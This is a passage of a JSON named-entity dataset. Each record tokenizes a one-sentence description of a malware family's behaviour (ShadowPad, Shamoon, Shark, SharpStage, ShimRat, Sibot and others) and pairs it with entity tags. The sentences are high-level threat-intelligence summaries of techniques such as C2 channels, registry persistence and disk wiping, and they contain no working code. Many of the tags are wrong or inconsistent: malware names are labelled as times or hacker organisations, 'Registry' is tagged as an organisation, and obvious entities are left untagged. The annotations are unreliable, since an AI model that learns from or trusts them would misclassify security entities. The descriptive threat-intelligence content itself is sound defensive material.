] }, { "tokens": [ "ShadowPad", "has", "downloaded", "code", "from", "a", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "can", "modify", "the", "Registry", "to", "store", "and", "maintain", "a", "configuration", "block", "and", "virtual", "file", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "B-Features", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "has", "used", "UDP", "for", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "has", "encoded", "data", "as", "readable", "Latin", "characters." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "has", "encrypted", "its", "payload,", "a", "virtual", "file", "system,", "and", "various", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "has", "collected", "the", "PID", "of", "a", "malicious", "process." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "has", "injected", "an", "install", "module", "into", "a", "newly", "created", "process." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "has", "sent", "data", "back", "to", "C2", "every", "8", "hours." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "has", "discovered", "system", "information", "including", "memory", "status,", "CPU", "frequency,", "OS", "versions,", "and", "volume", "serial", "numbers." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "has", "collected", "the", "domain", "name", "of", "the", "victim", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "has", "collected", "the", "username", "of", "the", "victim", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "has", "collected", "the", "current", "date", "and", "time", "of", "the", "victim", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShadowPad", "communicates", "over", "HTTP", "to", "retrieve", "a", "string", "that", "is", "decoded", "into", "a", "C2", "server", "URL." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "attempts", "to", "disable", "UAC", "remote", "restrictions", "by", "modifying", "the", "Registry." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Shamoon", "attempts", "to", "overwrite", "operating", "system", "files", "and", "disk", "structures", "with", "image", "files.", "In", "a", "later", "variant,", "randomly", "generated", "data", "was", "used", "for", "data", "overwrites." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Shamoon", "has", "an", "operational", "mode", "for", "encrypting", "data", "instead", "of", "overwriting", "it." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "decrypts", "ciphertext", "using", "an", "XOR", "cipher", "and", "a", "base64-encoded", "string." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "has", "been", "seen", "overwriting", "features", "of", "disk", "structure", "such", "as", "the", "MBR." ], "ner_tags": [ "O", "O", "O", "O", "B-Org", "B-Features", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "If", "Shamoon", "cannot", "access", "shares", "using", "current", "privileges,", "it", "attempts", "access", "using", "hard", "coded,", "domain-specific", "credentials", "gathered", "earlier", "in", "the", "intrusion." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "can", "download", "an", "executable", "to", "run", "on", "the", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "attempts", "to", "copy", "itself", "to", "remote", "machines", "on", "the", "network." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "creates", "a", "new", "service", "named", "“ntssrv”", "that", "attempts", "to", "appear", "legitimate;", "the", "service's", "display", "name", "is", "“Microsoft", "Network", "Realtime", "Inspection", "Service”", "and", "its", "description", "is", "“Helps", "guard", "against", "time", "change", "attempts", "targeting", "known", "and", "newly", "discovered", "vulnerabilities", "in", "network", "time", "protocols.”", "Newer", "versions", "create", "the", "\"MaintenaceSrv\"", "service,", "which", "misspells", "the", "word", "\"maintenance.\"" ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Once", "Shamoon", "has", "access", "to", "a", "network", "share,", "it", "enables", "the", "RemoteRegistry", "service", "on", "the", "target", "system.", "It", "will", "then", "connect", "to", "the", "system", "with", "RegConnectRegistryW", "and", "modify", "the", "Registry", "to", "disable", "UAC", "remote", "restrictions", "by", "setting", "<code>SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy</code>", "to", "1." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Shamoon", "contains", "base64-encoded", "strings." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "queries", "several", "Registry", "keys", "to", "identify", "hard", "disk", "partitions", "to", "overwrite." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "scans", "the", "C-class", "subnet", "of", "the", "IPs", "on", "the", "victim's", "interfaces." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "accesses", "network", "share(s),", "enables", "share", "access", "to", "the", "target", "device,", "copies", "an", "executable", "payload", "to", "the", "target", "system,", "and", "uses", "a", "Scheduled", "Task/Job", "to", "execute", "the", "malware." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "copies", "an", "executable", "payload", "to", "the", "target", "system", "by", "using", "SMB/Windows", "Admin", "Shares", "and", "then", "scheduling", "an", "unnamed", "task", "to", "execute", "the", "malware." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "creates", "a", "new", "service", "named", "“ntssrv”", "to", "execute", "the", "payload.", "Shamoon", "can", "also", "spread", "via", "PsExec." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Shamoon", "obtains", "the", "victim's", "operating", "system", "version", "and", "keyboard", "layout", "and", "sends", "the", "information", "to", "the", "C2", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "obtains", "the", "target's", "IP", "address", "and", "local", "network", "segment." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "will", "reboot", "the", "infected", "system", "once", "the", "wiping", "functionality", "has", "been", "completed." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "obtains", "the", "system", "time", "and", "will", "only", "activate", "if", "it", "is", "greater", "than", "a", "preset", "date." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "can", "change", "the", "modified", "time", "for", "files", "to", "evade", "forensic", "detection." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shamoon", "can", "impersonate", "tokens", "using", "<code>LogonUser</code>,", "<code>ImpersonateLoggedOnUser</code>,", "and", "<code>ImpersonateNamedPipeClient</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Shamoon", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Shamoon", "creates", "a", "new", "service", "named", "“ntssrv”", "to", "execute", "the", "payload.", "Newer", "versions", "create", "the", "\"MaintenaceSrv\"", "and", "\"hdv_725x\"", "services." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "Shark", "can", "use", "DNS", "in", "C2", "communications." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Shark", "has", "stored", "information", "in", "folders", "named", "`U1`", "and", "`U2`", "prior", "to", "exfiltration." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shark", "can", "upload", "files", "to", "its", "C2." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Shark", "can", "extract", "and", "decrypt", "downloaded", ".zip", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Shark", "can", "send", "DNS", "C2", "communications", "using", "a", "unique", "domain", "generation", "algorithm." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shark", "can", "use", "encrypted", "and", "encoded", "files", "for", "C2", "configuration." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shark", "has", "the", "ability", "to", "upload", "files", "from", "the", "compromised", "host", "over", "a", "DNS", "or", "HTTP", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "Shark", "can", "update", "its", "configuration", "to", "use", "a", "different", "C2", "server." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Shark", "can", "delete", "files", "downloaded", "to", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shark", "can", "download", "additional", "files", "from", "its", "C2", "via", "HTTP", "or", "DNS." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Shark", "binaries", "have", "been", "named", "`audioddg.pdb`", "and", "`Winlangdb.pdb`", "in", "order", "to", "appear", "legitimate." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shark", "can", "query", "`HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid`", "to", "retrieve", "the", "machine", "GUID." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shark", "can", "pause", "C2", "communications", "for", "a", "specified", "time." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shark", "can", "stop", "execution", "if", "the", "screen", "width", "of", "the", "targeted", "machine", "is", "not", "over", "600", "pixels." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shark", "can", "collect", "the", "GUID", "of", "a", "targeted", "machine." ], "ner_tags": [ "B-HackOrg", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Shark", "has", "the", "ability", "to", "use", "HTTP", "in", "C2", "communications." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Shark", "has", "the", "ability", "to", "use", "`CMD`", "to", "execute", "commands." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "SharpDisco", "has", "dropped", "a", "recent-files", "stealer", "plugin", "to", "`C:\\Users\\Public\\WinSrcNT\\It11.exe`." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SharpDisco", "can", "load", "a", "plugin", "to", "exfiltrate", "stolen", "files", "to", "SMB", "shares", "also", "used", "in", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SharpDisco", "has", "the", "ability", "to", "transfer", "data", "between", "SMB", "shares." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-Way", "O" ] }, { "tokens": [ "SharpDisco", "can", "identify", "recently", "opened", "files", "by", "using", "an", "LNK", "format", "parser", "to", "extract", "the", "original", "file", "path", "from", "LNK", "files", "found", "in", "either", "`%USERPROFILE%\\Recent`", "(Windows", "XP)", "or", "`%APPDATA%\\Microsoft\\Windows\\Recent`", "(newer", "Windows", "versions)", "." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "SharpDisco", "can", "hide", "windows", "using", "`ProcessWindowStyle.Hidden`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SharpDisco", "has", "been", "used", "to", "download", "a", "Python", "interpreter", "to", "`C:\\Users\\Public\\WinTN\\WinTN.exe`", "as", "well", "as", "other", "plugins", "from", "external", "sources." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SharpDisco", "can", "leverage", "Native", "APIs", "through", "plugins", "including", "`GetLogicalDrives`." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SharpDisco", "has", "dropped", "a", "plugin", "to", "monitor", "external", "drives", "to", "`C:\\Users\\Public\\It3.exe`." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SharpDisco", "can", "create", "scheduled", "tasks", "to", "execute", "reverse", "shells", "that", "read", "and", "write", "data", "to", "and", "from", "specified", "SMB", "shares." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "SharpDisco", "can", "use", "a", "plugin", "to", "enumerate", "system", "drives." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SharpDisco", "can", "use", "`cmd.exe`", "to", "execute", "plugins", "and", "to", "send", "command", "output", "to", "specified", "SMB", "shares." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SharpStage", "has", "decompressed", "data", "received", "from", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SharpStage", "has", "the", "ability", "to", "download", "and", "execute", "additional", "payloads", "via", "a", "DropBox", "API." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "SharpStage", "can", "execute", "arbitrary", "commands", "with", "PowerShell." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "B-Way" ] }, { "tokens": [ "SharpStage", "has", "the", "ability", "to", "create", "persistence", "for", "the", "malware", "using", "the", "Registry", "autorun", "key", "and", "startup", "folder." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "SharpStage", "has", "a", "persistence", "component", "to", "write", "a", "scheduled", "task", "for", "the", "payload." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SharpStage", "has", "the", "ability", "to", "capture", "the", "victim's", "screen." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-HackOrg", "B-Features" ] }, { "tokens": [ "SharpStage", "has", "checked", "the", "system", "settings", "to", "see", "if", "Arabic", "is", "the", "configured", "language." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SharpStage", "has", "been", "used", "to", "target", "Arabic-speaking", "users", "and", "used", "code", "that", "checks", "if", "the", "compromised", "machine", "has", "the", "Arabic", "language", "installed." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Area", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SharpStage", "has", "used", "a", "legitimate", "web", "service", "for", "evading", "detection." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "SharpStage", "can", "execute", "arbitrary", "commands", "with", "the", "command", "line." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SharpStage", "can", "use", "WMI", "for", "execution." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "ShimRat", "has", "installed", "shim", "databases", "in", "the", "<code>AppPatch</code>", "folder." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRat", "has", "hijacked", "the", "cryptbase.dll", "within", "migwiz.exe", "to", "escalate", "privileges.", "This", "prevented", "the", "User", "Access", "Control", "window", "from", "appearing." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRat", "has", "the", "capability", "to", "upload", "collected", "files", "to", "a", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "ShimRat", "has", "decompressed", "its", "core", "DLL", "using", "shellcode", "once", "an", "impersonated", "antivirus", "component", "was", "running", "on", "a", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRat", "can", "use", "pre-configured", "HTTP", "proxies." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "ShimRat", "has", "used", "a", "secondary", "C2", "location", "if", "the", "first", "was", "unavailable." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRat", "can", "uninstall", "itself", "from", "compromised", "hosts,", "as", "well", "create", "and", "modify", "directories,", "delete,", "move,", "copy,", "and", "rename", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "B-HackOrg", "B-Features", "B-Features", "B-Features", "O", "B-Features", "O" ] }, { "tokens": [ "ShimRat", "can", "list", "directories." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "ShimRat", "can", "hijack", "the", "cryptbase.dll", "within", "migwiz.exe", "to", "escalate", "privileges", "and", "bypass", "UAC", "controls." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRat", "can", "download", "additional", "files." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "ShimRat", "can", "impersonate", "Windows", "services", "and", "antivirus", "products", "to", "avoid", "detection", "on", "compromised", "systems." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Tool", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRat", "has", "registered", "two", "registry", "keys", "for", "shim", "databases." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRat", "has", "used", "Windows", "API", "functions", "to", "install", "the", "service", "and", "shim." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRat", "can", "enumerate", "connected", "drives", "for", "infected", "host", "machines." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRat", "has", "been", "delivered", "as", "a", "package", "that", "includes", "compressed", "DLL", "and", "shellcode", "payloads", "within", "a", ".dat", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "ShimRat", "has", "installed", "a", "registry", "based", "start-up", "key", "<code>HKCU\\Software\\microsoft\\windows\\CurrentVersion\\Run</code>", "to", "maintain", "persistence", "should", "other", "methods", "fail." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRat", "can", "sleep", "when", "instructed", "to", "do", "so", "by", "the", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRat's", "loader", "has", "been", "packed", "with", "the", "compressed", "ShimRat", "core", "DLL", "and", "the", "legitimate", "DLL", "for", "it", "to", "hijack." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRat", "communicated", "over", "HTTP", "and", "HTTPS", "with", "C2", "servers." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "ShimRat", "can", "be", "issued", "a", "command", "shell", "function", "from", "the", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRat", "has", "installed", "a", "Windows", "service", "to", "maintain", "persistence", "on", "victim", "machines." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "ShimRatReporter", "listed", "all", "non-privileged", "and", "privileged", "accounts", "available", "on", "the", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRatReporter", "used", "LZ", "compression", "to", "compress", "initial", "reconnaissance", "reports", "before", "sending", "to", "the", "C2." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRatReporter", "gathered", "information", "automatically,", "without", "instruction", "from", "a", "C2,", "related", "to", "the", "user", "and", "host", "machine", "that", "is", "compiled", "into", "a", "report", "and", "sent", "to", "the", "operators." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRatReporter", "sent", "collected", "system", "and", "network", "information", "compiled", "into", "a", "report", "to", "an", "adversary-controlled", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRatReporter", "sent", "generated", "reports", "to", "the", "C2", "via", "HTTP", "POST", "requests." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRatReporter", "had", "the", "ability", "to", "download", "additional", "payloads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "ShimRatReporter", "spoofed", "itself", "as", "<code>AlphaZawgyl_font.exe</code>,", "a", "specialized", "Unicode", "font." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "ShimRatReporter", "used", "several", "Windows", "API", "functions", "to", "gather", "information", "from", "the", "infected", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRatReporter", "encrypted", "gathered", "information", "with", "a", "combination", "of", "shifting", "and", "XOR", "using", "a", "static", "key." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "ShimRatReporter", "gathered", "the", "local", "privileges", "for", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRatReporter", "listed", "all", "running", "processes", "on", "the", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRatReporter", "gathered", "a", "list", "of", "installed", "software", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRatReporter", "gathered", "the", "operating", "system", "name", "and", "specific", "Windows", "version", "of", "an", "infected", "machine." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRatReporter", "gathered", "the", "local", "proxy,", "domain,", "IP,", "routing", "tables,", "mac", "address,", "gateway,", "DNS", "servers,", "and", "DHCP", "status", "information", "from", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ShimRatReporter", "used", "the", "Windows", "function", "<code>GetExtendedUdpTable</code>", "to", "detect", "connected", "UDP", "endpoints." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "ShimRatReporter", "communicated", "over", "HTTP", "with", "preconfigured", "C2", "servers." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Sibot", "has", "obfuscated", "scripts", "used", "in", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sibot", "can", "decrypt", "data", "received", "from", "a", "C2", "and", "save", "to", "a", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sibot", "will", "delete", "itself", "if", "a", "certain", "server", "response", "is", "received." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sibot", "has", "installed", "a", "second-stage", "script", "in", "the", "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot</code>", "registry", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Sibot", "will", "delete", "an", "associated", "registry", "key", "if", "a", "certain", "server", "response", "is", 